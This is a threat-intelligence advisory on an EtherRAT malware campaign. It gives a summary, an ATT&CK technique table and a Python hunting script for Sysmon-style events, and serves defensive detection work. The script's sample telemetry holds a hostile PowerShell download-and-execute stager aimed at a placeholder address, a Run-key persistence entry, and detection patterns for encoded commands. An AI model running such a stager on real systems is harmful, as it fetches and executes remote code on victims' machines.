EXECUTIVE SUMMARY:
A large-scale malicious infrastructure has been identified distributing EtherRAT malware alongside phishing pages, fraudulent software, malicious documents, and remote access tools. The activity relies on a network of interconnected websites that masquerade as legitimate services and software resources to attract victims. The operation demonstrates a coordinated approach to malware delivery, credential theft, and unauthorized system access, increasing the risk to both individual users and organizations.
The operation distributes EtherRAT, a Node.js-based remote access trojan that gives the attacker full control over a compromised system and executes commands received from command-and-control infrastructure. Delivery mechanisms include MSI installers, PowerShell scripts, and other staged downloads hosted in publicly accessible (open) directories. Rather than embedding C2 addresses directly, the malware retrieves its command-and-control information from blockchain-based sources, a dead-drop resolver pattern that makes takedown of the C2 path harder. Analysis of related domains and infrastructure uncovered additional resources hosting phishing kits, malicious documents, remote management software, and other malware families, indicating a diversified distribution network supporting multiple attack objectives.
This campaign reflects how threat actors are combining phishing operations, malware distribution, and deceptive software offerings within a single infrastructure to maximize victim reach and persistence. Organizations should strengthen web filtering, monitor for unauthorized remote access tools, verify software sources before installation, and maintain effective endpoint protection. User awareness training and proactive threat monitoring remain essential to reducing exposure to phishing attempts, malware infections, and credential theft associated with such multi-purpose malicious infrastructures.
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
| --- | --- | --- | --- |
| Initial Access | T1566.001 | Phishing | Spearphishing Attachment |
| Initial Access | T1566.002 | Phishing | Spearphishing Link |
| Execution | T1059.001 | Command and Scripting Interpreter | PowerShell |
| Execution | T1204.002 | User Execution | Malicious File |
| Execution | T1204.001 | User Execution | Malicious Link |
| Persistence | T1547.001 | Boot or Logon Autostart Execution | Registry Run Keys / Startup Folder |
| Defense Evasion | T1027.013 | Obfuscated Files or Information | Encrypted/Encoded File |
| Defense Evasion | T1218.007 | System Binary Proxy Execution | Msiexec |
| Discovery | T1082 | System Information Discovery | - |
| Discovery | T1016.001 | System Network Configuration Discovery | Internet Connection Discovery |
| Collection | T1005 | Data from Local System | - |
| Command and Control | T1071.001 | Application Layer Protocol | Web Protocols |
| Command and Control | T1102.001 | Web Service | Dead Drop Resolver |
| Command and Control | T1090.003 | Proxy | Multi-hop Proxy |
| Command and Control | T1573.001 | Encrypted Channel | Symmetric Cryptography |
| Exfiltration | T1041 | Exfiltration Over C2 Channel | - |
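The delivery chain summarised above and in the threat profile (MSI installer, PowerShell stage, Node.js runtime dropped to a user-writable path, Run-key persistence, outbound beaconing) can be hunted for as a sequence rather than as isolated alerts. The following Python is an added example, not code or indicators from the original report: the Sysmon-style event records, hostnames, paths and the TEST-NET address 203.0.113.10 are constructed for illustration, and the four rules map to the technique IDs in the table above. It flags msiexec.exe spawning a script interpreter (T1218.007), a PowerShell `-EncodedCommand` stage and decodes it (T1059.001 / T1027.013), a Run key pointing at a binary under AppData, Temp, ProgramData or Public (T1547.001), and a node.exe running outside a standard install path making a network connection (T1071.001).

```python
"""Hunt for an MSI -> PowerShell -> Node.js RAT chain over Sysmon-style events.

All telemetry below is constructed sample data (hypothetical host WS01,
placeholder paths, TEST-NET address 203.0.113.10); none of it is an indicator
from the report. Rules are illustrative and map to ATT&CK IDs in the table.
"""
import base64
import ntpath
import re
from collections import Counter

# Constructed PowerShell stager, encoded the way `powershell -enc` expects
# (base64 over UTF-16LE). Hypothetical URL, not a real indicator.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
ENC = base64.b64encode(STAGER.encode("utf-16le")).decode()

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RAT = r"C:\Users\alice\AppData\Roaming\svc\node.exe"

# Constructed sample telemetry, flattened to dicts.
EVENTS = [
    {"event": "ProcessCreate", "host": "WS01", "image": r"C:\Windows\System32\msiexec.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": r"msiexec.exe /i C:\Users\alice\Downloads\Update.msi /qn"},
    {"event": "ProcessCreate", "host": "WS01", "image": PS,
     "parent": r"C:\Windows\System32\msiexec.exe", "cmd": f"powershell.exe -nop -w hidden -enc {ENC}"},
    {"event": "ProcessCreate", "host": "WS01", "image": RAT, "parent": PS,
     "cmd": r"node.exe C:\Users\alice\AppData\Roaming\svc\app.js"},
    {"event": "RegistryValueSet", "host": "WS01", "image": PS,
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\svc",
     "details": RAT + r" C:\Users\alice\AppData\Roaming\svc\app.js"},
    {"event": "NetworkConnect", "host": "WS01", "image": RAT, "dst": "203.0.113.10", "dport": 443},
    # Benign noise: a browser, and a developer's Node.js in its normal install path.
    {"event": "ProcessCreate", "host": "WS01", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent": r"C:\Windows\explorer.exe", "cmd": "chrome.exe"},
    {"event": "NetworkConnect", "host": "WS01", "image": r"C:\Program Files\nodejs\node.exe",
     "dst": "203.0.113.20", "dport": 443},
]

# Script interpreters that msiexec.exe has no business spawning on a workstation.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
# Locations a standard user can write to; a runtime launched from here is suspicious.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?\\", re.I)
# -e / -ec / -en / -enc / -encodedcommand, as PowerShell accepts them.
ENC_FLAG = re.compile(r"\s-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]+)", re.I)
CHAIN = {"T1218.007", "T1059.001", "T1547.001", "T1071.001"}


def basename(path):
    return ntpath.basename(path).lower()


def decode_encoded_command(cmd):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    m = ENC_FLAG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events):
    """Apply the four chain rules; return a list of findings tagged with ATT&CK IDs."""
    findings = []

    def hit(tech, e, why):
        findings.append({"technique": tech, "host": e["host"], "evidence": why})

    for e in events:
        img = basename(e.get("image", ""))
        if e["event"] == "ProcessCreate":
            if basename(e.get("parent", "")) == "msiexec.exe" and img in INTERPRETERS:
                hit("T1218.007", e, f"msiexec.exe spawned {img}")
            if img in {"powershell.exe", "pwsh.exe"}:
                decoded = decode_encoded_command(e["cmd"])
                if decoded is not None:
                    hit("T1059.001", e, f"encoded command (T1027.013) decodes to: {decoded[:80]}")
        elif e["event"] == "RegistryValueSet":
            if RUN_KEY.search(e["target"]) and USER_WRITABLE.search(e["details"]):
                hit("T1547.001", e, f"Run key {e['target']} -> {e['details']}")
        elif e["event"] == "NetworkConnect":
            if img == "node.exe" and USER_WRITABLE.search(e["image"]):
                hit("T1071.001", e, f"node.exe from user-writable path -> {e['dst']}:{e['dport']}")
    return findings


def summarize(findings):
    """Count findings per technique ID."""
    return dict(Counter(f["technique"] for f in findings))


def chain_complete(findings, host):
    """True when every stage of the chain has fired on the given host."""
    return CHAIN <= {f["technique"] for f in findings if f["host"] == host}


if __name__ == "__main__":
    results = hunt(EVENTS)
    for f in results:
        print(f["technique"], f["host"], f["evidence"])
    print("full chain on WS01:", chain_complete(results, "WS01"))
```

Each rule alone produces noise (developers run node.exe, installers legitimately launch msiexec), which is why `chain_complete` requires all stages on the same host before treating the activity as a likely RAT installation; the Run-key and user-writable-path checks are the cheapest place to add coverage for other droppers that use the same persistence.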
REFERENCES:
The following reports contain further technical details: